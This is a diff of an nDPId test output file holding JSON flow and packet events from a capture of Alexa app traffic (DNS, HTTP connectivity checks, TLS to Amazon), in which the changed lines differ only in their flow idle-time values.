-00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="} +00581{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027733,"flow_last_seen":1490976027733,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976027733,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} 
+00485{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":40,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":1,"flow_last_seen":1490976027733,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027733,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8c0BAAEAGOiysECrYrNkJjorUAFAegTplAAAAAKAC\/\/+MiQAAAgQFtAQCCAoA9kklAAAAAAEDAwg="} 00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":41,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":5,"flow_packet_id":3,"flow_last_seen":1490976027741,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":70,"pkt_type":34525,"pkt_l3_offset":14,"pkt_l4_offset":54,"pkt_len":70,"pkt_l4_len":16,"thread_ts_msec":1490976027741,"pkt":"MzMAAAACePiC0\/vCht1gAAAAABA6\/\/6AAAAAAAAAeviC\/\/7T+8L\/AgAAAAAAAAAAAAAAAAAChQCMEAAAAAABAXj4gtP7wg=="} -00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"} 
-00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} +00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":43,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":2,"flow_last_seen":1490976027776,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976027776,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8g+MAADQGdYms2QmOrBAq2ABQitTVYWKuHoE6ZqASpahLiwAAAgQFZAQCCApVvw3GAPZJJQEDAwc="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":44,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_packet_id":3,"flow_last_seen":1490976027777,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976027777,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0c0FAAEAGOjOsECrYrNkJjorUAFAegTpm1WFir4AQAVceVQAAAQEICgD2SSlVvw3G"} 
+00864{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":45,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":13,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976027733,"flow_last_seen":1490976027780,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":188,"flow_tot_l4_payload_len":188,"flow_avg_l4_payload_len":47,"midstream":0,"thread_ts_msec":1490976027780,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.217.9.142","src_port":35540,"dst_port":80,"l4_proto":"tcp","ndpi": {"confidence": {"4":"DPI"},"proto":"HTTP.Google","breed":"Acceptable","category":"ConnCheck"},"http": {"hostname":"connectivitycheck.android.com","url":"connectivitycheck.android.com\/generate_204","code":0,"content_type":"","user_agent":"Dalvik\/2.1.0 (Linux; U; Android 5.1.1; LGLS751 Build\/LMY47V)"}} 00552{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","flow_datalink":1,"flow_max_packets":3} 00512{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_packet_id":1,"flow_last_seen":1490976027958,"flow_idle_time":120000,"pkt_oversize":false,"pkt_caplen":94,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":94,"pkt_l4_len":60,"thread_ts_msec":1490976027958,"pkt":"ePiC0\/vCAMDKkaPvCABFwABQaiwAAEABYsesECoBrBAq2AUBiVKsECoqRQAANNZ6QAA\/BgDirBAq2K3C37ynfhRsXkGjCY7hdlaAEAFbkZsAAAEBCAoA9kk7K\/xGxA=="} 
00630{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":56,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":14,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976027958,"flow_last_seen":1490976027958,"flow_idle_time":120000,"flow_min_l4_payload_len":60,"flow_max_l4_payload_len":60,"flow_tot_l4_payload_len":60,"flow_avg_l4_payload_len":60,"midstream":0,"thread_ts_msec":1490976027958,"l3_proto":"ip4","src_ip":"172.16.42.1","dst_ip":"172.16.42.216","l4_proto":"icmp","ndpi": {"confidence": {"4":"DPI"},"proto":"ICMP","breed":"Acceptable","category":"Network"},"entropy":5.192626} 
@@ -73,48 +73,48 @@ 00773{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":62,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029184,"flow_last_seen":1490976029184,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":32,"flow_tot_l4_payload_len":32,"flow_avg_l4_payload_len":32,"midstream":0,"thread_ts_msec":1490976029184,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00657{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_packet_id":2,"flow_last_seen":1490976029244,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":203,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":203,"pkt_l4_len":169,"thread_ts_msec":1490976029244,"pkt":"ePiC0\/vCAMDKkaPvCABFAAC90PZAAEARvD+sECoBrBAq2AA1vBsAqWPAqIqBgAABAAYAAAAAA3d3dwZhbWF6b24DY29tAAABAAHADAAFAAEAAAToAAoDd3d3A2NkbsAQwCwABQABAAAABgAfDmQzYWc0aHVra2g2MnluCmNsb3VkZnJvbnQDbmV0AMBCAAEAAQAAAAQABDRV0cXAQgABAAEAAAAEAAQ0VdGPwEIAAQABAAAABAAENFXR2MBCAAEAAQAAAAQABDRV0Xo="} 
00789{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":63,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":15,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029184,"flow_last_seen":1490976029244,"flow_idle_time":180000,"flow_min_l4_payload_len":32,"flow_max_l4_payload_len":161,"flow_tot_l4_payload_len":193,"flow_avg_l4_payload_len":96,"midstream":0,"thread_ts_msec":1490976029244,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":48155,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"www.amazon.com","num_queries":1,"num_answers":6,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.85.209.197"}} -00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="} 
-00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="} -00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"} -00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
-01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} -01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} +00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029248,"flow_last_seen":1490976029248,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029248,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} +00486{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":64,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":1,"flow_last_seen":1490976029248,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029248,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8xDtAAEAGmX2sECrYNFXRxdfKAbvTso2HAAAAAKAC\/\/\/liQAAAgQFtAQCCAoA9km8AAAAAAEDAwg="} 
+00483{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":65,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":2,"flow_last_seen":1490976029325,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029325,"pkt":"ePiC0\/vCAMDKkVoBCABFAAA8AABAAPMGqrg0VdHFrBAq2AG718qLhBMS07KNiKAScSCB1QAAAgQFtAQCCAptCebiAPZJvAEDAwg="} +00471{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":66,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_packet_id":3,"flow_last_seen":1490976029328,"flow_idle_time":7560000,"pkt_oversize":false,"pkt_caplen":66,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":66,"pkt_l4_len":32,"thread_ts_msec":1490976029328,"pkt":"AMDKkaPvePiC0\/vCCABFAAA0xDxAAEAGmYSsECrYNFXRxdfKAbvTso2Ii4QTE4AQAVcgZAAAAQEICgD2ScRtCebi"} +00965{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":67,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":4,"flow_first_seen":1490976029248,"flow_last_seen":1490976029341,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":221,"flow_tot_l4_payload_len":221,"flow_avg_l4_payload_len":55,"midstream":0,"thread_ts_msec":1490976029341,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"","unsafe_cipher":0,"cipher":"TLS_NULL_WITH_NULL_NULL"}} 
+01022{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":69,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":6,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":1669,"flow_avg_l4_payload_len":278,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": {"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256"}} +01500{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":71,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":16,"flow_state":"info","flow_packets_processed":8,"flow_first_seen":1490976029248,"flow_last_seen":1490976029387,"flow_idle_time":7560000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":1448,"flow_tot_l4_payload_len":3691,"flow_avg_l4_payload_len":461,"midstream":0,"thread_ts_msec":1490976029387,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.85.209.197","src_port":55242,"dst_port":443,"l4_proto":"tcp","ndpi": {"flow_risk": {"15": {"risk":"TLS (probably) Not Carrying HTTPS","severity":"Low","risk_score": {"total":760,"client":680,"server":80}}},"confidence": {"4":"DPI"},"proto":"TLS.Amazon","breed":"Acceptable","category":"Web"},"tls": 
{"version":"TLSv1.2","client_requested_server_name":"www.amazon.com","server_names":"amazon.com,amzn.com,uedata.amazon.com,us.amazon.com,www.amazon.com,www.amzn.com,corporate.amazon.com,buybox.amazon.com,iphone.amazon.com,yp.amazon.com,home.amazon.com,origin-www.amazon.com","ja3":"bdf21e38e1f69776df407235625e75e2","ja3s":"389ed42c02ebecc32e73aa31def07e14","unsafe_cipher":0,"cipher":"TLS_ECDHE_RSA_WITH_AES_128_GCM_SHA256","issuerDN":"C=US, O=Symantec Corporation, OU=Symantec Trust Network, CN=Symantec Class 3 Secure Server CA - G4","subjectDN":"C=US, ST=Washington, L=Seattle, O=Amazon.com, Inc., CN=www.amazon.com","fingerprint":"EF:14:6C:F1:5C:4A:F8:4D:BA:83:C2:1E:6C:5B:ED:C4:FA:34:1C:3E"}} 00582{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","flow_datalink":1,"flow_max_packets":3} 00495{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":1,"flow_last_seen":1490976029669,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":84,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":84,"pkt_l4_len":50,"thread_ts_msec":1490976029669,"pkt":"AMDKkaPvePiC0\/vCCABFAABGWk9AAEARM16sECrYrBAqAU3\/ADUAMlRV5qsBAAABAAAAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQAB"} 
00783{"flow_event_id":6,"flow_event_name":"detected","thread_id":0,"packet_id":79,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029669,"flow_last_seen":1490976029669,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":42,"flow_tot_l4_payload_len":42,"flow_avg_l4_payload_len":42,"midstream":0,"thread_ts_msec":1490976029669,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": {"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":0,"num_answers":0,"reply_code":0,"query_type":1,"rsp_type":0,"rsp_addr":"0.0.0.0"}} 00552{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_packet_id":2,"flow_last_seen":1490976029753,"flow_idle_time":180000,"pkt_oversize":false,"pkt_caplen":126,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":126,"pkt_l4_len":92,"thread_ts_msec":1490976029753,"pkt":"ePiC0\/vCAMDKkaPvCABFAABw0QhAAEARvHqsECoBrBAq2AA1Tf8AXGjL5quBgAABAAIAAAAABG1hZHMPYW1hem9uLWFkc3lzdGVtA2NvbQAAAQABwAwABQABAAACoQAOBG1hZHMGYW1hem9uwCHANgABAAEAAAAGAAQ0XugA"} 00796{"flow_event_id":7,"flow_event_name":"detection-update","thread_id":0,"packet_id":80,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":17,"flow_state":"info","flow_packets_processed":2,"flow_first_seen":1490976029669,"flow_last_seen":1490976029753,"flow_idle_time":180000,"flow_min_l4_payload_len":42,"flow_max_l4_payload_len":84,"flow_tot_l4_payload_len":126,"flow_avg_l4_payload_len":63,"midstream":0,"thread_ts_msec":1490976029753,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"172.16.42.1","src_port":19967,"dst_port":53,"l4_proto":"udp","ndpi": {"confidence": 
{"4":"DPI"},"proto":"DNS.Amazon","breed":"Acceptable","category":"Web"},"dns": {"query":"mads.amazon-adsystem.com","num_queries":1,"num_answers":2,"reply_code":0,"query_type":1,"rsp_type":1,"rsp_addr":"52.94.232.0"}} -00580{"flow_event_id":1,"flow_event_name":"new","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_state":"info","flow_packets_processed":1,"flow_first_seen":1490976029756,"flow_last_seen":1490976029756,"flow_idle_time":7440000,"flow_min_l4_payload_len":0,"flow_max_l4_payload_len":0,"flow_tot_l4_payload_len":0,"flow_avg_l4_payload_len":0,"midstream":0,"thread_ts_msec":1490976029756,"l3_proto":"ip4","src_ip":"172.16.42.216","dst_ip":"52.94.232.0","src_port":33556,"dst_port":443,"l4_proto":"tcp","flow_datalink":1,"flow_max_packets":3} -00487{"packet_event_id":2,"packet_event_name":"packet-flow","thread_id":0,"packet_id":81,"source":"alexa-app.pcapng","alias":"nDPId-test","flow_id":18,"flow_packet_id":1,"flow_last_seen":1490976029756,"flow_idle_time":7440000,"pkt_oversize":false,"pkt_caplen":74,"pkt_type":2048,"pkt_l3_offset":14,"pkt_l4_offset":34,"pkt_len":74,"pkt_l4_len":40,"thread_ts_msec":1490976029756,"pkt":"AMDKkaPvePiC0\/vCCABFAAA8YepAAEAG5YqsECrYNF7oAIMUAbsV\/ygFAAAAAKAC\/\/9G\/wAAAgQFtAQCCAoA9knvAAAAAAEDAwg="} 